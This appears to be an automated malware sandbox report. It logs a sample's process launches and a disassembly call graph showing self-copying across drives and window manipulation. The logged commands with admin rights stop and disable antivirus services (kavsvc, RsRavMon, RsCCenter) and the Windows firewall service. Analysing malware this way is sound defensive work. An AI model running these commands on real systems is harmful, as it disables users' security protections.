                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop kavsvc
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config kavsvc start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:25
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config RsRavMon start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop sharedaccess
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop RsCCenter
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop KVWSC
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config RsCCenter start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:34
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop RsRavMon
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop KVSrvXP
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:37
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop kavsvc
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:38
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop RsCCenter
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:39
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop RsRavMon
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:40
                                                                          Start time:11:12:17
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:41
                                                                          Start time:11:12:17
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:42
                                                                          Start time:11:12:22
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\wuauclt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\wuauclt.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:43
                                                                          Start time:11:12:25
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                          Wow64 process (32bit):
                                                                          Commandline:"C:\Program Files\Internet Explorer\iexplore.exe"
                                                                          Imagebase:
                                                                          File size:834'512 bytes
                                                                          MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:45
                                                                          Start time:11:12:27
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\explorer.exe" http://www.dvdforone.com
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:46
                                                                          Start time:11:12:28
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:47
                                                                          Start time:11:12:28
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:48
                                                                          Start time:11:12:29
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:26.9%
                                                                            Dynamic/Decrypted Code Coverage:6.1%
                                                                            Signature Coverage:7.6%
                                                                            Total number of Nodes:1891
                                                                            Total number of Limit Nodes:37
                                                                            execution_graph 7335 4049c1 7336 4049a3 7335->7336 7337 4039f4 17 API calls 7336->7337 7338 4049b3 7337->7338 7339 4039d0 17 API calls 7338->7339 7340 4049bb 7339->7340 5469 439cc7 5470 439ced 5469->5470 5471 439d06 VirtualAlloc 5470->5471 5473 439d2a 5471->5473 5476 439d46 5473->5476 5475 439d3e 5477 439d9b 5476->5477 5479 439e05 LoadLibraryA 5477->5479 5480 439e3f 5477->5480 5479->5477 5482 5318b2 5480->5482 5483 5318c0 5482->5483 5484 5318f4 CreateMutexA 5483->5484 5487 439eb9 5483->5487 5485 53190f 5484->5485 5484->5487 5486 531925 FindCloseChangeNotification 5485->5486 5485->5487 5488 531933 5486->5488 5487->5475 5488->5487 5489 53196a CreateThread 5488->5489 5489->5487 5490 531856 Sleep 5489->5490 5493 53168f 5490->5493 5515 5311b6 VirtualAlloc 5493->5515 5495 5316a6 5516 5311b6 VirtualAlloc 5495->5516 5497 531841 5532 5311ca VirtualFree 5497->5532 5499 531847 5533 5311ca VirtualFree 5499->5533 5501 5316ae 5501->5497 5514 53182c 5501->5514 5517 531611 5501->5517 5504 531611 4 API calls 5505 531760 5504->5505 5505->5497 5506 531777 5505->5506 5521 5311ca VirtualFree 5506->5521 5508 53177c 5522 5311ca VirtualFree 5508->5522 5510 531782 5523 53144d 5510->5523 5512 5317da 5513 5317fe CreateProcessA 5512->5513 5512->5514 5513->5514 5515->5495 5516->5501 5520 53162c 5517->5520 5518 531683 5518->5497 5518->5504 5520->5518 5534 53151b 5520->5534 5521->5508 5522->5510 5543 5311b6 VirtualAlloc 5523->5543 5525 53146b 5525->5512 5526 531462 5526->5525 5527 5314ff 5526->5527 5544 5313c4 5526->5544 5548 5311ca VirtualFree 5527->5548 5530 531497 5531 5314eb PostThreadMessageA 5530->5531 5531->5527 5532->5499 5533->5514 5535 531549 5534->5535 5536 53160a 5535->5536 5537 53158a CreateToolhelp32Snapshot 5535->5537 5536->5520 5537->5536 5538 531597 Process32First 5537->5538 5540 5315ac 5538->5540 5539 5315fe FindCloseChangeNotification 5539->5536 5540->5539 5541 5315f5 5540->5541 5542 5315e9 Process32Next 5540->5542 5541->5539 5542->5540 5543->5526 5547 5313e2 5544->5547 5545 531441 5545->5530 5546 5313e9 LoadLibraryA 5546->5545 5546->5547 5547->5545 5547->5546 5548->5525 6935 43834b 6936 43835e VirtualFree 6935->6936 6939 438408 6936->6939 6943 438524 6939->6943 6940 4384f9 VirtualProtect 6940->6940 6941 438518 6940->6941 6945 43844c 6943->6945 6946 438532 6943->6946 6944 438550 LoadLibraryA 6944->6945 6944->6946 6945->6940 6945->6941 6946->6944 6946->6945 7120 4084c8 7121 406f74 50 API calls 7120->7121 7122 4084cd 7121->7122 7131 406c30 7122->7131 7124 4084d7 7127 4084ef 7124->7127 7166 405fb0 7124->7166 7126 408511 7127->7126 7128 404d04 GetVersionExA 7127->7128 7129 408507 7128->7129 7129->7126 7212 406354 7129->7212 7132 404f2c 18 API calls 7131->7132 7133 406c62 7132->7133 7134 403b5c 17 API calls 7133->7134 7135 406c6f 7134->7135 7136 404cf4 4 API calls 7135->7136 7137 406c77 7136->7137 7138 406ee7 7137->7138 7139 404f2c 18 API calls 7137->7139 7140 4039f4 17 API calls 7138->7140 7141 406c87 7139->7141 7142 406f01 7140->7142 7143 403b5c 17 API calls 7141->7143 7142->7124 7144 406c94 7143->7144 7145 4027bc 4 API calls 7144->7145 7146 406cab 7145->7146 7147 402560 4 API calls 7146->7147 7148 406cb0 7147->7148 7149 402dec 17 API calls 7148->7149 7150 406cc0 7149->7150 7151 402e58 4 API calls 7150->7151 7152 406cca 7151->7152 7153 402560 4 API calls 7152->7153 7154 406ccf 7153->7154 7155 402ba8 4 API calls 7154->7155 7156 406cd9 7155->7156 7157 402560 4 API calls 7156->7157 7158 406cde FindWindowA 7157->7158 7158->7138 7159 406d00 GetWindowTextA 7158->7159 7160 403b3c 17 API calls 7159->7160 7164 406d32 7160->7164 7161 406ebb FindWindowExA 7161->7138 7161->7159 7162 406db2 FindWindowExA FindWindowExA FindWindowExA FindWindowExA FindWindowExA 7162->7161 7162->7164 7163 403b3c 17 API calls 7163->7164 7164->7161 7164->7162 7164->7163 7165 406e6b SendMessageA Sleep SendMessageA SendMessageA 7164->7165 7165->7161 7176 405fb8 7166->7176 7167 40601a GetDriveTypeA 7167->7176 7168 406283 7169 4039f4 17 API calls 7168->7169 7171 40629d 7169->7171 7170 404cf4 FindFirstFileA FindClose FileTimeToLocalFileTime FileTimeToDosDateTime 7170->7176 7172 4039d0 17 API calls 7171->7172 7174 4062a5 7172->7174 7173 403ba0 17 API calls 7173->7176 7174->7127 7175 4060c3 SetFileAttributesA 7177 403ba0 17 API calls 7175->7177 7176->7167 7176->7168 7176->7170 7176->7173 7176->7175 7178 406061 7176->7178 7211 406273 SetFileAttributesA 7176->7211 7179 4060de 7177->7179 7180 403ba0 17 API calls 7178->7180 7182 4060e6 SetFileAttributesA 7179->7182 7181 406073 7180->7181 7184 40607b SetFileAttributesA 7181->7184 7183 403ba0 17 API calls 7182->7183 7185 4060fc 7183->7185 7186 403ba0 17 API calls 7184->7186 7188 406104 DeleteFileA 7185->7188 7187 406093 7186->7187 7190 40609b SetFileAttributesA 7187->7190 7189 403ba0 17 API calls 7188->7189 7191 40611a 7189->7191 7190->7168 7192 406122 DeleteFileA 7191->7192 7193 403e74 17 API calls 7192->7193 7194 406134 7193->7194 7195 406140 GetModuleFileNameA 7194->7195 7196 403e74 17 API calls 7195->7196 7198 406155 7196->7198 7197 403ba0 17 API calls 7197->7198 7198->7197 7199 406177 CopyFileA 7198->7199 7200 403ba0 17 API calls 7199->7200 7202 40618d 7200->7202 7201 4027c8 4 API calls 7201->7202 7202->7201 7203 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7203 7204 4027d4 4 API calls 7202->7204 7205 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7205 7206 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7206 7207 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7207 7208 403ba0 17 API calls 7202->7208 7209 406253 SetFileAttributesA 7202->7209 7203->7202 7204->7202 7205->7202 7206->7202 7207->7202 7208->7202 7210 403ba0 17 API calls 7209->7210 7210->7176 7211->7176 7222 40635c 7212->7222 7213 4063be GetDriveTypeA 7213->7222 7214 403ba0 17 API calls 7214->7222 7215 406627 7216 4039f4 17 API calls 7215->7216 7217 406641 7216->7217 7218 4039d0 17 API calls 7217->7218 7219 406649 7218->7219 7219->7126 7220 404cf4 FindFirstFileA FindClose FileTimeToLocalFileTime FileTimeToDosDateTime 7220->7222 7221 406467 SetFileAttributesA 7223 403ba0 17 API calls 7221->7223 7222->7213 7222->7214 7222->7215 7222->7220 7222->7221 7224 406405 7222->7224 7257 406617 SetFileAttributesA 7222->7257 7225 406482 7223->7225 7226 403ba0 17 API calls 7224->7226 7228 40648a SetFileAttributesA 7225->7228 7227 406417 7226->7227 7230 40641f SetFileAttributesA 7227->7230 7229 403ba0 17 API calls 7228->7229 7231 4064a0 7229->7231 7232 403ba0 17 API calls 7230->7232 7234 4064a8 DeleteFileA 7231->7234 7233 406437 7232->7233 7236 40643f SetFileAttributesA 7233->7236 7235 403ba0 17 API calls 7234->7235 7237 4064be 7235->7237 7236->7215 7238 4064c6 DeleteFileA 7237->7238 7239 403e74 17 API calls 7238->7239 7240 4064d8 7239->7240 7241 4064e4 GetModuleFileNameA 7240->7241 7242 403e74 17 API calls 7241->7242 7244 4064f9 7242->7244 7243 403ba0 17 API calls 7243->7244 7244->7243 7245 40651b CopyFileA 7244->7245 7246 403ba0 17 API calls 7245->7246 7248 406531 7246->7248 7247 4027c8 4 API calls 7247->7248 7248->7247 7249 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7248->7249 7250 4027d4 4 API calls 7248->7250 7251 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7248->7251 7252 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7248->7252 7253 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7248->7253 7254 403ba0 17 API calls 7248->7254 7255 4065f7 SetFileAttributesA 7248->7255 7249->7248 7250->7248 7251->7248 7252->7248 7253->7248 7254->7248 7256 403ba0 17 API calls 7255->7256 7256->7222 7257->7222 7341 4051c8 7342 4051cc 7341->7342 7343 405293 7342->7343 7344 4039d0 17 API calls 7342->7344 7345 4051f3 7344->7345 7346 4039d0 17 API calls 7345->7346 7347 4051fd 7346->7347 7348 4039d0 17 API calls 7347->7348 7349 405207 7348->7349 7350 4039d0 17 API calls 7349->7350 7351 405211 7350->7351 7352 4039d0 17 API calls 7351->7352 7353 40521b 7352->7353 7354 4039d0 17 API calls 7353->7354 7355 405225 7354->7355 7356 4039d0 17 API calls 7355->7356 7357 40522f 7356->7357 7358 4039d0 17 API calls 7357->7358 7359 405239 7358->7359 7360 4039d0 17 API calls 7359->7360 7361 405243 7360->7361 7362 4039d0 17 API calls 7361->7362 7363 40524d 7362->7363 7364 4039d0 17 API calls 7363->7364 7365 405257 7364->7365 7366 4039d0 17 API calls 7365->7366 7367 405261 7366->7367 7368 4039d0 17 API calls 7367->7368 7369 40526b 7368->7369 7370 4039d0 17 API calls 7369->7370 7371 405275 7370->7371 7372 4039d0 17 API calls 7371->7372 7373 40527f 7372->7373 7374 4039d0 17 API calls 7373->7374 7375 405289 7374->7375 7376 4039d0 17 API calls 7375->7376 7376->7343 7377 407dc8 7378 407dd0 Sleep 7377->7378 7379 404f2c 18 API calls 7378->7379 7380 407df9 7379->7380 7381 403b5c 17 API calls 7380->7381 7382 407e06 7381->7382 7383 404af8 20 API calls 7382->7383 7384 407e25 7383->7384 7385 4039d0 17 API calls 7384->7385 7386 407e2f 7385->7386 7387 404dd0 17 API calls 7386->7387 7388 407e40 7387->7388 7389 404dd0 17 API calls 7388->7389 7390 407e56 7389->7390 7391 404c18 21 API calls 7390->7391 7392 407e6b 7391->7392 7393 403a24 17 API calls 7392->7393 7394 407e78 7393->7394 7395 407e87 7394->7395 7396 4068d0 26 API calls 7394->7396 7397 4039f4 17 API calls 7395->7397 7396->7395 7398 407ea1 7397->7398 7048 403449 7049 404164 4 API calls 7048->7049 7050 40344e 7049->7050 7307 43814a 7308 438159 7307->7308 7310 4381fa 7308->7310 7311 438214 7310->7311 7312 438231 VirtualAlloc 7311->7312 7314 43851d 7311->7314 7313 438273 7312->7313 7312->7314 7315 43827e 3 API calls 7313->7315 7314->7308 7315->7314 7403 4051cc 7404 405293 7403->7404 7405 4051e9 7403->7405 7406 4039d0 17 API calls 7405->7406 7407 4051f3 7406->7407 7408 4039d0 17 API calls 7407->7408 7409 4051fd 7408->7409 7410 4039d0 17 API calls 7409->7410 7411 405207 7410->7411 7412 4039d0 17 API calls 7411->7412 7413 405211 7412->7413 7414 4039d0 17 API calls 7413->7414 7415 40521b 7414->7415 7416 4039d0 17 API calls 7415->7416 7417 405225 7416->7417 7418 4039d0 17 API calls 7417->7418 7419 40522f 7418->7419 7420 4039d0 17 API calls 7419->7420 7421 405239 7420->7421 7422 4039d0 17 API calls 7421->7422 7423 405243 7422->7423 7424 4039d0 17 API calls 7423->7424 7425 40524d 7424->7425 7426 4039d0 17 API calls 7425->7426 7427 405257 7426->7427 7428 4039d0 17 API calls 7427->7428 7429 405261 7428->7429 7430 4039d0 17 API calls 7429->7430 7431 40526b 7430->7431 7432 4039d0 17 API calls 7431->7432 7433 405275 7432->7433 7434 4039d0 17 API calls 7433->7434 7435 40527f 7434->7435 7436 4039d0 17 API calls 7435->7436 7437 405289 7436->7437 7438 4039d0 17 API calls 7437->7438 7438->7404 5549 408bd4 5550 408bdc 5549->5550 5550->5550 5605 4041b0 GetModuleHandleA 5550->5605 5553 408c45 5609 404f2c GetWindowsDirectoryA 5553->5609 5554 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5554->5553 5558 408c5f 5559 408c67 SetFileAttributesA 5558->5559 5628 403e74 5559->5628 5561 408c7c 5562 408c8d GetModuleFileNameA 5561->5562 5563 403e74 17 API calls 5562->5563 5564 408ca5 5563->5564 5565 404f2c 18 API calls 5564->5565 5566 408cad 5565->5566 5567 403b5c 17 API calls 5566->5567 5568 408cba 5567->5568 5569 408cc2 DeleteFileA 5568->5569 5570 404f2c 18 API calls 5569->5570 5571 408cd2 5570->5571 5572 403b5c 17 API calls 5571->5572 5573 408cdf 5572->5573 5574 408cf4 CopyFileA 5573->5574 5634 404a64 5574->5634 5577 404f2c 18 API calls 5578 408d15 5577->5578 5579 403b5c 17 API calls 5578->5579 5580 408d22 5579->5580 5581 404a64 18 API calls 5580->5581 5582 408d2d 5581->5582 5583 408d38 5582->5583 5584 408d79 5582->5584 5640 404d98 5583->5640 5585 404d98 18 API calls 5584->5585 5587 408d7e 5585->5587 5589 406928 26 API calls 5587->5589 5591 408d83 5589->5591 5736 4049cc GetVersionExA 5591->5736 5594 404f2c 18 API calls 5596 408d50 5594->5596 5598 403b5c 17 API calls 5596->5598 5600 408d5d 5598->5600 5599 408d77 5751 4039f4 5599->5751 5601 408d65 ShellExecuteA 5600->5601 5730 407d8c 5601->5730 5606 4041e3 5605->5606 5755 403788 5606->5755 5610 403b3c 17 API calls 5609->5610 5611 404f52 5610->5611 5612 404f6e 5611->5612 5613 403b5c 17 API calls 5611->5613 5614 403b5c 5612->5614 5613->5612 5615 403b60 5614->5615 5616 403b9f 5614->5616 5617 403b6a 5615->5617 5622 403a24 5615->5622 5616->5558 5618 403b94 5617->5618 5619 403b7d 5617->5619 5623 403e74 17 API calls 5618->5623 5621 403e74 17 API calls 5619->5621 5620 403a66 5620->5558 5627 403b82 5621->5627 5624 403a94 17 API calls 5622->5624 5625 403a38 5622->5625 5623->5627 5624->5625 5625->5620 5626 40248c 17 API calls 5625->5626 5626->5620 5627->5558 5630 403e81 5628->5630 5633 403eb1 5628->5633 5629 4039d0 17 API calls 5631 403e8d 5629->5631 5630->5631 5632 403a94 17 API calls 5630->5632 5631->5561 5632->5633 5633->5629 5635 404a72 5634->5635 6832 403ac0 5635->6832 5638 404a93 5638->5577 5639 404a8a CharUpperBuffA 5639->5638 5641 403e74 17 API calls 5640->5641 5642 404da7 5641->5642 5643 404db6 GetModuleFileNameA 5642->5643 5644 403e74 17 API calls 5643->5644 5645 404dce 5644->5645 5646 406928 5645->5646 5647 406930 5646->5647 6837 402f90 5647->6837 5650 402560 4 API calls 5651 40697c 5650->5651 6841 402c3c 5651->6841 5654 402560 4 API calls 5655 40698c 5654->5655 6849 402fac 5655->6849 5657 40699c 5658 402560 4 API calls 5657->5658 5659 4069a1 5658->5659 6856 402b88 5659->6856 5662 402560 4 API calls 5663 4069ba 5662->5663 5664 402c3c 6 API calls 5663->5664 5665 4069d8 5664->5665 5666 402560 4 API calls 5665->5666 5667 4069dd 5666->5667 5668 402fac 6 API calls 5667->5668 5669 4069ef 5668->5669 5670 402560 4 API calls 5669->5670 5671 4069f4 